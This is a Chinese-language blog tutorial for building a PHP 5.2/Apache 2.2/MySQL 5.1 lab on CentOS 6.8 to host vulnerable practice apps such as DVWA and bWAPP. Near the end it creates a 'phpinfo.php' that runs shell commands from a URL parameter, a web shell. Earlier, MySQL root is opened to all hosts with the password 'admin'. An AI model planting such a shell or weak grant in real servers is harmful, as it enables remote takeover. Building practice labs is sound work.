Httpd 2.2.34 + Mysql 5.1.68 + centOS 6.8_x64 + Php 5.2.17

2016-06-23 by klion

一、首先,部署apache

0x01 还是接着我们之前准备好的系统继续,首先,将所有准备安装的源码包上传至服务器,软件包列表如下:

httpd-2.2.34.tar.gz
libiconv-1.14.tar.gz
libmcrypt-2.5.8.tar.gz
mcrypt-2.6.8.tar.gz
mhash-0.9.9.9.tar.gz
mysql-5.1.68.tar.gz
php-5.2.17.tar.gz
cronolog-1.6.2.tar.gz

本次要完成的大致架构如下:

1	httpd 2.2.34 + mysql 5.1.68 + centOS 6.8_x64 + php 5.2.17

0x02 开始编译安装httpd 2.2.34,不过在此之前,你还需要把相应的依赖库先装好,具体过程如下:

# yum install zlib zlib-devel gcc-c++ -y
# tar xf httpd-2.2.34.tar.gz && cd httpd-2.2.34

# ./configure --prefix=/usr/local/httpd-2.2.34 \
--enable-deflate \
--enable-expires \
--enable-headers \
--enable-modules=most \
--enable-so \
--with-mpm=worker \
--enable-rewrite

# make && make install
# echo $?

0x03 去除apache版本号,方便后续写脚本自动化管理,启动httpd,并将其加入系统自启动

# ln -s /usr/local/httpd-2.2.34/ /usr/local/httpd
# cd /usr/local/httpd && ll
# /usr/local/httpd/bin/apachectl -l
# vi /usr/local/httpd/conf/httpd.conf
  ServerName localhost:80
# /usr/local/httpd/bin/apachectl start
# echo "/usr/local/httpd/bin/apachectl start" >> /etc/rc.local
# cd /usr/local/httpd/conf/ && cp httpd.conf httpd.conf.bak && egrep -v "^$|#" httpd.conf.bak > httpd.conf
# /usr/local/httpd/bin/apachectl -t
# /usr/local/httpd/bin/apachectl graceful

0x04 关于 apachectl工具使用说明

1
2
3

# /usr/local/httpd/bin/apachectl -h
# /usr/local/httpd/bin/apachectl -l
# /usr/local/httpd/bin/apachectl -M

0x05 编辑apache主配置文件 httpd.conf,开启扩展配置,定义web目录,httpd.conf详细配置如下:

1 2	# useradd tmp -s /sbin/nologin -M # mkdir /var/html/{bwapp,wp,discuz,drupal,joomla,phpcms,phpbb,dvwa} -p

# vi /usr/local/httpd/conf/httpd.conf

ServerRoot "/usr/local/httpd-2.2.34"
Listen 80
<IfModule !mpm_netware_module>
<IfModule !mpm_winnt_module>
User tmp
Group tmp
</IfModule>
</IfModule>
ServerAdmin seclamp@sec.com
ServerName localhost:80
DocumentRoot "/usr/local/httpd-2.2.34/htdocs"
<Directory />
    Options FollowSymLinks
    AllowOverride None
    Order deny,allow
    Deny from all
</Directory>
<Directory "/usr/local/httpd-2.2.34/htdocs">
    Options Indexes FollowSymLinks
    AllowOverride None
    Order allow,deny
    Allow from all
</Directory>
<IfModule dir_module>
    DirectoryIndex index.html
</IfModule>
<FilesMatch "^\.ht">
    Order allow,deny
    Deny from all
    Satisfy All
</FilesMatch>
ErrorLog "logs/error_log"
LogLevel warn
<IfModule log_config_module>
    LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\"" combined
    LogFormat "%h %l %u %t \"%r\" %>s %b" common
    <IfModule logio_module>
      LogFormat "%h %l %u %t \"%r\" %>s %b \"%{Referer}i\" \"%{User-Agent}i\" %I %O" combinedio
    </IfModule>
    CustomLog "logs/access_log" common
</IfModule>
<IfModule alias_module>
    ScriptAlias /cgi-bin/ "/usr/local/httpd-2.2.34/cgi-bin/"
</IfModule>
<IfModule cgid_module>
</IfModule>
<Directory "/usr/local/httpd-2.2.34/cgi-bin">
    AllowOverride None
    Options None
    Order allow,deny
    Allow from all
</Directory>
DefaultType text/plain
<IfModule headers_module>
    RequestHeader unset Proxy early
</IfModule>
<IfModule mime_module>
    TypesConfig conf/mime.types
    AddType application/x-compress .Z
    AddType application/x-gzip .gz .tgz
</IfModule>
<IfModule ssl_module>
SSLRandomSeed startup builtin
SSLRandomSeed connect builtin
</IfModule>
Include conf/extra/httpd-vhosts.conf
Include conf/extra/httpd-mpm.conf
Include conf/extra/httpd-default.conf
<Directory "/var/html">
    Options FollowSymLinks
    AllowOverride None
    Order allow,deny
    Allow from all
</Directory>

0x06 编辑httpd-vhosts.conf扩展配置文件,添加基于域名的虚拟主机

# vi /usr/local/httpd/conf/extra/httpd-vhosts.conf

NameVirtualHost *:80
<VirtualHost *:80>
    ServerAdmin bwapp@bwapp.com
    DocumentRoot "/var/html/bwapp"
    ServerName www.bwapp.com
    ServerAlias www.bwapp.com
    ErrorLog "logs/bwapp-error_log"
    CustomLog "|/usr/local/sbin/cronolog /usr/local/httpd/logs/bwapp-access_%Y%m%d.log" combined
</VirtualHost>
<VirtualHost *:80>
    ServerAdmin wp@wp.com
    DocumentRoot "/var/html/wp"
    ServerName wp.com
    ServerAlias www.wp.com
    ErrorLog "logs/wp-error_log"
    CustomLog "|/usr/local/sbin/cronolog /usr/local/httpd/logs/wp-access_%Y%m%d.log" combined
</VirtualHost>
<VirtualHost *:80>
    ServerAdmin discuz@discuz.com
    DocumentRoot "/var/html/discuz"
    ServerName discuz.com
    ServerAlias www.discuz.com
    ErrorLog "logs/discuz-error_log"
    CustomLog "|/usr/local/sbin/cronolog /usr/local/httpd/logs/discuz-access_%Y%m%d.log" combined
</VirtualHost>
<VirtualHost *:80>
    ServerAdmin drupal@durpal.com
    DocumentRoot "/var/html/drupal"
    ServerName drupal.com
    ServerAlias www.drupal.com
    ErrorLog "logs/drupal-error_log"
    CustomLog "|/usr/local/sbin/cronolog /usr/local/httpd/logs/drupal-access_%Y%m%d.log" combined
</VirtualHost>
<VirtualHost *:80>
    ServerAdmin joomla@joomla.com
    DocumentRoot "/var/html/joomla"
    ServerName joomla.com
    ServerAlias www.joomla.com
    ErrorLog "logs/joomla-error_log"
    CustomLog "|/usr/local/sbin/cronolog /usr/local/httpd/logs/joomla-access_%Y%m%d.log" combined
</VirtualHost>
<VirtualHost *:80>
    ServerAdmin phpcms@phpcms.com
    DocumentRoot "/var/html/phpcms"
    ServerName phpcms.com
    ServerAlias www.phpcms.com
    ErrorLog "logs/phpcms-error_log"
    CustomLog "|/usr/local/sbin/cronolog /usr/local/httpd/logs/phpcms-access_%Y%m%d.log" combined
</VirtualHost>
<VirtualHost *:80>
    ServerAdmin phpbb@phpbb.com
    DocumentRoot "/var/html/phpbb"
    ServerName phpbb.com
    ServerAlias www.phpbb.com
    ErrorLog "logs/phppp-error_log"
    CustomLog "|/usr/local/sbin/cronolog /usr/local/httpd/logs/phppp-access_%Y%m%d.log" combined
</VirtualHost>
<VirtualHost *:80>
    ServerAdmin dvwa@bwapp.com
    DocumentRoot "/var/html/dvwa"
    ServerName dvwa.com
    ServerAlias www.dvwa.com
    ErrorLog "logs/dvwa-error_log"
    CustomLog "|/usr/local/sbin/cronolog /usr/local/httpd/logs/dvwa-access_%Y%m%d.log" combined
</VirtualHost>

0x07 利用cronlog工具来实现日志自动轮询,只需要到各个虚拟主机中去调整为如下的格式即可

# tar xf cronolog-1.6.2.tar.gz
# cd cronolog-1.6.2
# ./configure && make && make install
# echo $?

# vi /usr/local/httpd/conf/extra/httpd-vhosts.conf
<VirtualHost *:80>
    ServerAdmin phpbb@phpbb.com
    DocumentRoot "/var/html/phpbb"
    ServerName phpbb.com
    ServerAlias www.phpbb.com
    ErrorLog "logs/phppp-error_log"
    CustomLog "|/usr/local/sbin/cronolog /usr/local/httpd/logs/phppp-access_%Y%m%d.log" combined
</VirtualHost>

0x08 初步优化apache

调节apache默认并发

# vi /usr/local/httpd/conf/extra/httpd-mpm.conf
<IfModule mpm_worker_module>
    StartServers          2
    MaxClients          300
    MinSpareThreads      45
    MaxSpareThreads      75
    ThreadsPerChild      25
    MaxRequestsPerChild   0
</IfModule>

配置文件级别隐藏apache版本号

# vi /usr/local/httpd/conf/extra/httpd-default.conf

Timeout 300
KeepAlive 	On
MaxKeepAliveRequests 	100
KeepAliveTimeout 5
UseCanonicalName Off
AccessFileName 	.htaccess
ServerTokens 	Prod
ServerSignature Off
HostnameLookups Off

1 2	# /usr/local/httpd/bin/apachectl -t # /usr/local/httpd/bin/apachectl graceful

二、部署mysql

创建mysql服务用户

1 2	# groupadd mysql # useradd mysql -s /sbin/nologin -M -g mysql

编译安装mysql-5.1.68,详细编译参数如下:

# yum install ncurses-devel openssl openssl-devel -y
# tar xf mysql-5.1.68.tar.gz
# cd mysql-5.1.68

# ./configure \
--prefix=/usr/local/mysql-5.1.68 \
--with-unix-socket-path=/usr/local/mysql-5.1.68/tmp/mysql.sock \
--localstatedir=/usr/local/mysql-5.1.68/data \
--enable-assembler \
--enable-thread-safe-client \
--enable-static \
--with-mysqld-user=mysql \
--with-big-tables \
--without-debug \
--with-pthread \
--with-charset=utf8 \
--with-extra-charsets=all \
--with-readline \
--with-ssl \
--with-embedded-server \
--enable-local-infile \
--with-plugins=max \
--with-plugins=partition,innobase \
--with-mysqld-ldflags=-all-static \
--with-client-ldflags=-all-static

# make && make install
# echo $?
# ln -s /usr/local/mysql-5.1.68/ /usr/local/mysql

快速初始化mysql

# cp support-files/my-small.cnf /etc/my.cnf
# mkdir /usr/local/mysql/data
# chown -R mysql.mysql /usr/local/mysql
# /usr/local/mysql/bin/mysql_install_db --basedir=/usr/local/mysql --datadir=/usr/local/mysql/data/ --user=mysql
# chown -R root.root /usr/local/mysql/
# chown -R mysql.mysql /usr/local/mysql/{tmp,data}
# /usr/local/mysql/bin/mysqld_safe &
# echo "/usr/local/mysql/bin/mysqld_safe &" >> /etc/rc.local
# lsof -i :3306
# cp /usr/local/mysql/bin/* /usr/local/sbin/
# mysqladmin -uroot password "admin"

# mysql -uroot -p
mysql> drop database test;
mysql> select user,host from mysql.user;
mysql> drop user ''@'localhost';
mysql> drop user ''@'seclamp';
mysql> drop user 'root'@'seclamp';
mysql> grant all on *.* to 'root'@'%' identified by 'admin' with grant option;flush privileges;

三、部署php

安装好所需的各种依赖库

# yum install -y zlib zlib-devel libxml2-devel libjpeg 
# yum install -y libjpeg-devel libpng libpng-devel libxslt-devel
# yum install -y freetype freetype-devel gd gd-devel curl curl-devel
# yum  install epel-release -y
# yum install libmcrypt libmcrypt-devel mcrypt mhash mhash-devel openssl openssl-devel bzip2-devel -y
# wget https://ftp.gnu.org/gnu/libiconv/libiconv-1.14.tar.gz
# tar xf libiconv-1.14.tar.gz
# cd libiconv-1.14 && ./configure --prefix=/usr/local/libiconv && make && make install
# ln -s /usr/lib64/libjpeg.so /usr/lib/libjpeg.so
# ln -s /usr/lib64/libpng.so /usr/lib/libpng.so
# yum install libtool libtool-ltdl-devel -y

编译安装 php 5.2.17,复制的时候,务必注意下空格

# tar xf php-5.2.17.tar.gz
# cd php-5.2.17

# ./configure \
--prefix=/usr/local/php-5.2.17 \
--with-apxs2=/usr/local/httpd/bin/apxs \
--with-mysql=/usr/local/mysql \
--with-pdo-mysql=/usr/local/mysql \
--with-config-file-path=/etc \
--with-config-file-scan-dir=/etc/php.d \
--with-xmlrpc \
--with-openssl \
--with-zlib \
--with-bz2 \
--with-gettext \
--with-mhash \
--with-mcrypt \
--with-libxml-dir \
--with-iconv=/usr/local/libiconv \
--with-curl \
--with-gd \
--with-jpeg-dir \
--with-png-dir \
--with-freetype-dir \
--enable-gd-native-ttf \
--enable-bcmath \
--enable-mbstring \
--enable-zip \
--enable-soap \
--enable-sockets \
--enable-ftp \
--enable-static \
--enable-zend-multibyte \
--without-pear

# echo "#LoadModule php5_module  /usr/local/httpd-2.2.34/modules/libphp5.so" >> httpd.conf
# make && make install
# ln -s /usr/local/php-5.2.17/ /usr/local/php
# ll /usr/local/httpd/modules/
# grep "libphp5" /usr/local/httpd/conf/httpd.conf
# cp php.ini-dist /etc/php.ini

安装各种php扩展库

# yum install autoconf -y
# cd ext/mysqli/
# /usr/local/php/bin/phpize
# ./configure --prefix=/usr/local/mysqli \
--with-php-config=/usr/local/php/bin/php-config \
--with-mysqli=/usr/local/mysql/bin/mysql_config

# make && make install
# ls /usr/local/php-5.2.17/lib/php/extensions/no-debug-zts-20060613/
# vi /etc/php.ini
  extension_dir = "/usr/local/php-5.2.17/lib/php/extensions/no-debug-zts-20060613/"
  extension=mysqli.so

# vi /usr/local/httpd/conf/httpd.conf

<IfModule dir_module>
    DirectoryIndex index.php index.html
</IfModule>
<IfModule mime_module>
    TypesConfig conf/mime.types
    AddType application/x-compress .Z
    AddType application/x-gzip .gz .tgz
    AddType application/x-httpd-php .php
</IfModule>

回过头来好好检查刚刚编译的扩展是不是确实都装上了,看看web服务用户权限是不是自己设定好的那个

# vi /var/html/bwapp/phpinfo.php
<?php
    echo "<pre>";
    @system($_GET['cmd']);
    echo "</pre>";
    phpinfo();
?>

四、安装各类开源程序对环境进行全面可用性检测

安装bwapp 漏洞演练程序
安装dvwa 漏洞演练程序
安装 Discuz X3.2 
安装drupal 7.56
安装 wordpress 4.8.1
安装 joomla 3.6.5
...

End
写脚本,写脚本,写脚本,重要的事情说三遍,或者更暴力一点,配好了以后直接打rpm包,另外,此环境仅作为自己学习之用,所以基本没做过任何加固处理,严禁直接参考用于实际生产环境中,否则,一切后果自负

env

#env

APT404-不作恶

Httpd 2.2.34 + Mysql 5.1.68 + centOS 6.8_x64 + Php 5.2.17